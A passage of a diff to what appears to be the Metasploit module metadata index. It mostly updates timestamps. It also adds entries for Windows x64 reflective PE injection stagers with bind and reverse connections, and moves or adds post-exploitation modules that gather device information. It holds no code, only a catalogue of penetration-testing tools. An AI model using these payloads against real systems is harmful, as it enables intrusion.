    "targets": null,
-    "mod_time": "2018-02-15 15:10:26 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb",
    "is_install_path": true,
    "ref_name": "windows/upexec/reverse_tcp_uuid",
@@ -163606,7 +166310,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-06-11 04:48:52 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_udp.rb",
    "is_install_path": true,
    "ref_name": "windows/upexec/reverse_udp",
@@ -163716,7 +166420,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/vncinject/bind_ipv6_tcp",
@@ -163753,7 +166457,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb",
    "is_install_path": true,
    "ref_name": "windows/vncinject/bind_ipv6_tcp_uuid",
@@ -163788,7 +166492,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-27 19:24:51 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb",
    "is_install_path": true,
    "ref_name": "windows/vncinject/bind_named_pipe",
@@ -163859,7 +166563,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/vncinject/bind_tcp",
@@ -163897,7 +166601,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb",
    "is_install_path": true,
    "ref_name": "windows/vncinject/bind_tcp_rc4",
@@ -163933,7 +166637,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb",
    "is_install_path": true,
    "ref_name": "windows/vncinject/bind_tcp_uuid",
@@ -164040,7 +166744,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-12-08 06:24:02 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_http.rb",
    "is_install_path": true,
    "ref_name": "windows/vncinject/reverse_http",
@@ -164217,7 +166921,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-15 15:10:26 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/vncinject/reverse_tcp",
@@ -164290,7 +166994,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb",
    "is_install_path": true,
    "ref_name": "windows/vncinject/reverse_tcp_dns",
@@ -164328,7 +167032,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-15 15:10:26 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb",
    "is_install_path": true,
    "ref_name": "windows/vncinject/reverse_tcp_rc4",
@@ -164366,7 +167070,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb",
    "is_install_path": true,
    "ref_name": "windows/vncinject/reverse_tcp_rc4_dns",
@@ -164402,7 +167106,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-15 15:10:26 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb",
    "is_install_path": true,
    "ref_name": "windows/vncinject/reverse_tcp_uuid",
@@ -164438,7 +167142,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-11-21 13:53:33 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_winhttp.rb",
    "is_install_path": true,
    "ref_name": "windows/vncinject/reverse_winhttp",
@@ -165090,7 +167794,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-04-24 12:02:45 +0000",
+    "mod_time": "2020-06-24 09:25:53 +0000",
    "path": "/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/meterpreter_bind_named_pipe",
@@ -165125,7 +167829,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-04-24 12:02:45 +0000",
+    "mod_time": "2020-06-24 09:25:53 +0000",
    "path": "/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/meterpreter_bind_tcp",
@@ -165160,7 +167864,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-04-24 12:02:45 +0000",
+    "mod_time": "2020-06-24 09:25:53 +0000",
    "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/meterpreter_reverse_http",
@@ -165195,7 +167899,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-04-24 12:02:45 +0000",
+    "mod_time": "2020-06-24 09:25:53 +0000",
    "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/meterpreter_reverse_https",
@@ -165230,7 +167934,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-04-24 12:02:45 +0000",
+    "mod_time": "2020-06-24 09:25:53 +0000",
    "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/meterpreter_reverse_ipv6_tcp",
@@ -165265,7 +167969,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-04-24 12:02:45 +0000",
+    "mod_time": "2020-06-24 09:25:53 +0000",
    "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/meterpreter_reverse_tcp",
@@ -165276,6 +167980,359 @@
    },
    "needs_cleanup": false
  },
+  "payload_windows/x64/peinject/bind_ipv6_tcp": {
+    "name": "Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager",
+    "fullname": "payload/windows/x64/peinject/bind_ipv6_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for an IPv6 connection (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2017-07-24 06:26:21 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/peinject/bind_ipv6_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/peinject/bind_ipv6_tcp_uuid": {
+    "name": "Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support",
+    "fullname": "payload/windows/x64/peinject/bind_ipv6_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "OJ Reeves"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for an IPv6 connection with UUID Support (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2017-07-24 06:26:21 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/peinject/bind_ipv6_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/peinject/bind_named_pipe": {
+    "name": "Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager",
+    "fullname": "payload/windows/x64/peinject/bind_named_pipe",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "UserExistsError"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a pipe connection (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2018-02-15 17:37:33 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/peinject/bind_named_pipe",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/peinject/bind_tcp": {
+    "name": "Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager",
+    "fullname": "payload/windows/x64/peinject/bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a connection (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2017-07-24 06:26:21 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/peinject/bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/peinject/bind_tcp_rc4": {
+    "name": "Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)",
+    "fullname": "payload/windows/x64/peinject/bind_tcp_rc4",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "mihi",
+      "max3raza",
+      "RageLtMan"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2019-06-04 07:13:34 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/bind_tcp_rc4.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/peinject/bind_tcp_rc4",
+    "check": false,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/peinject/bind_tcp_uuid": {
+    "name": "Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)",
+    "fullname": "payload/windows/x64/peinject/bind_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "OJ Reeves"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a connection with UUID Support (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2017-07-24 06:26:21 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/peinject/bind_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/peinject/reverse_named_pipe": {
+    "name": "Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager",
+    "fullname": "payload/windows/x64/peinject/reverse_named_pipe",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "OJ Reeves"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker via a named pipe pivot",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2019-08-15 18:10:44 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/reverse_named_pipe.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/peinject/reverse_named_pipe",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/peinject/reverse_tcp": {
+    "name": "Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager",
+    "fullname": "payload/windows/x64/peinject/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2017-07-24 06:26:21 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/peinject/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/peinject/reverse_tcp_rc4": {
+    "name": "Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
+    "fullname": "payload/windows/x64/peinject/reverse_tcp_rc4",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "mihi",
+      "max3raza",
+      "RageLtMan"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2018-03-04 17:43:15 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/peinject/reverse_tcp_rc4",
+    "check": false,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/peinject/reverse_tcp_uuid": {
+    "name": "Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)",
+    "fullname": "payload/windows/x64/peinject/reverse_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "OJ Reeves"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker with UUID Support (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2017-07-24 06:26:21 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/peinject/reverse_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "payload_windows/x64/pingback_reverse_tcp": {
    "name": "Windows x64 Pingback, Reverse TCP Inline",
    "fullname": "payload/windows/x64/pingback_reverse_tcp",
@@ -166521,39 +169578,6 @@
    },
    "needs_cleanup": null
  },
-  "post_brocade/gather/enum_brocade": {
-    "name": "Brocade Gather Device General Information",
-    "fullname": "post/brocade/gather/enum_brocade",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "post",
-    "author": [
-      "h00die"
-    ],
-    "description": "This module collects Brocade device information and configuration.\n        This module has been tested against an icx6430 running 08.0.20T311.",
-    "references": [
-
-    ],
-    "platform": "Brocade",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": null,
-    "autofilter_services": null,
-    "targets": null,
-    "mod_time": "2019-06-01 22:23:01 +0000",
-    "path": "/modules/post/brocade/gather/enum_brocade.rb",
-    "is_install_path": true,
-    "ref_name": "brocade/gather/enum_brocade",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": null
-  },
  "post_bsd/gather/hashdump": {
    "name": "BSD Dump Password Hashes",
    "fullname": "post/bsd/gather/hashdump",
@@ -166587,39 +169611,6 @@
    },
    "needs_cleanup": null
  },
-  "post_cisco/gather/enum_cisco": {
-    "name": "Cisco Gather Device General Information",
-    "fullname": "post/cisco/gather/enum_cisco",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "post",
-    "author": [
-      "Carlos Perez <carlos_perez@darkoperator.com>"
-    ],
-    "description": "This module collects a Cisco IOS or NXOS device information and configuration.",
-    "references": [
-
-    ],
-    "platform": "Cisco",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": null,
-    "autofilter_services": null,
-    "targets": null,
-    "mod_time": "2019-07-21 20:57:47 +0000",
-    "path": "/modules/post/cisco/gather/enum_cisco.rb",
-    "is_install_path": true,
-    "ref_name": "cisco/gather/enum_cisco",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": null
-  },
  "post_firefox/gather/cookies": {
    "name": "Firefox Gather Cookies from Privileged Javascript Shell",
    "fullname": "post/firefox/gather/cookies",
@@ -167118,39 +170109,6 @@
    },
    "needs_cleanup": null
  },
-  "post_juniper/gather/enum_juniper": {
-    "name": "Juniper Gather Device General Information",
-    "fullname": "post/juniper/gather/enum_juniper",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "post",
-    "author": [
-      "h00die"
-    ],
-    "description": "This module collects a Juniper ScreenOS and JunOS device information and configuration.",
-    "references": [
-
-    ],
-    "platform": "Juniper",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": null,
-    "autofilter_services": null,
-    "targets": null,
-    "mod_time": "2018-07-30 14:20:01 +0000",
-    "path": "/modules/post/juniper/gather/enum_juniper.rb",
-    "is_install_path": true,
-    "ref_name": "juniper/gather/enum_juniper",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": null
-  },
  "post_linux/busybox/enum_connections": {
    "name": "BusyBox Enumerate Connections",
    "fullname": "post/linux/busybox/enum_connections",
@@ -167614,6 +170572,39 @@
    },
    "needs_cleanup": null
  },
+  "post_linux/gather/enum_containers": {
+    "name": "Linux Container Enumeration",
+    "fullname": "post/linux/gather/enum_containers",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "stealthcopter"
+    ],
+    "description": "This module attempts to enumerate containers on the target machine and optionally run a command on each active container found.\n          Currently it supports Docker, LXC and RKT.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-08-06 09:31:17 +0000",
+    "path": "/modules/post/linux/gather/enum_containers.rb",
+    "is_install_path": true,
+    "ref_name": "linux/gather/enum_containers",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "post_linux/gather/enum_nagios_xi": {
    "name": "Nagios XI Enumeration",
    "fullname": "post/linux/gather/enum_nagios_xi",
@@ -170217,7 +173208,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-24 10:28:07 +0000",
    "path": "/modules/post/multi/manage/sudo.rb",
    "is_install_path": true,
    "ref_name": "multi/manage/sudo",
@@ -170226,7 +173217,7 @@
    "default_credential": false,
    "notes": {
    },
-    "needs_cleanup": null
+    "needs_cleanup": true
  },
  "post_multi/manage/system_session": {
    "name": "Multi Manage System Remote TCP Shell Session",
@@ -170344,7 +173335,7 @@
    "references": [

    ],
-    "platform": "AIX,Android,Apple_iOS,BSD,BSDi,Brocade,Cisco,Firefox,FreeBSD,HPUX,Hardware,Irix,Java,JavaScript,Juniper,Linux,Mainframe,Multi,NetBSD,Netware,NodeJS,OSX,OpenBSD,PHP,Python,R,Ruby,Solaris,Unifi,Unix,Unknown,Windows",
+    "platform": "AIX,Android,Apple_iOS,Arista,BSD,BSDi,Brocade,Cisco,Firefox,FreeBSD,HPUX,Hardware,Irix,Java,JavaScript,Juniper,Linux,Mainframe,Mikrotik,Multi,NetBSD,Netware,NodeJS,OSX,OpenBSD,PHP,Python,R,Ruby,Solaris,Unifi,Unix,Unknown,Windows",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
@@ -170427,6 +173418,171 @@
    },
    "needs_cleanup": null
  },
+  "post_networking/gather/enum_brocade": {
+    "name": "Brocade Gather Device General Information",
+    "fullname": "post/networking/gather/enum_brocade",
+    "aliases": [
+      "post/brocade/gather/enum_brocade"
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module collects Brocade device information and configuration.\n          This module has been tested against an icx6430 running 08.0.20T311.",
+    "references": [
+
+    ],
+    "platform": "Brocade",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-06-21 16:36:16 +0000",
+    "path": "/modules/post/networking/gather/enum_brocade.rb",
+    "is_install_path": true,
+    "ref_name": "networking/gather/enum_brocade",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
+  "post_networking/gather/enum_cisco": {
+    "name": "Cisco Gather Device General Information",
+    "fullname": "post/networking/gather/enum_cisco",
+    "aliases": [
+      "post/cisco/gather/enum_cisco"
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Carlos Perez <carlos_perez@darkoperator.com>"
+    ],
+    "description": "This module collects a Cisco IOS or NXOS device information and configuration.",
+    "references": [
+
+    ],
+    "platform": "Cisco",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-08-19 07:46:55 +0000",
+    "path": "/modules/post/networking/gather/enum_cisco.rb",
+    "is_install_path": true,
+    "ref_name": "networking/gather/enum_cisco",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
+  "post_networking/gather/enum_f5": {
+    "name": "F5 Gather Device General Information",
+    "fullname": "post/networking/gather/enum_f5",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module collects a F5's device information and configuration.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-12 10:07:23 +0000",
+    "path": "/modules/post/networking/gather/enum_f5.rb",
+    "is_install_path": true,
+    "ref_name": "networking/gather/enum_f5",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
+  "post_networking/gather/enum_juniper": {
+    "name": "Juniper Gather Device General Information",
+    "fullname": "post/networking/gather/enum_juniper",
+    "aliases": [
+      "post/juniper/gather/enum_juniper"
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module collects a Juniper ScreenOS and JunOS device information and configuration.",
+    "references": [
+
+    ],
+    "platform": "Juniper",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-07-16 10:10:11 +0000",
+    "path": "/modules/post/networking/gather/enum_juniper.rb",
+    "is_install_path": true,
+    "ref_name": "networking/gather/enum_juniper",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
+  "post_networking/gather/enum_mikrotik": {
+    "name": "Mikrotik Gather Device General Information",
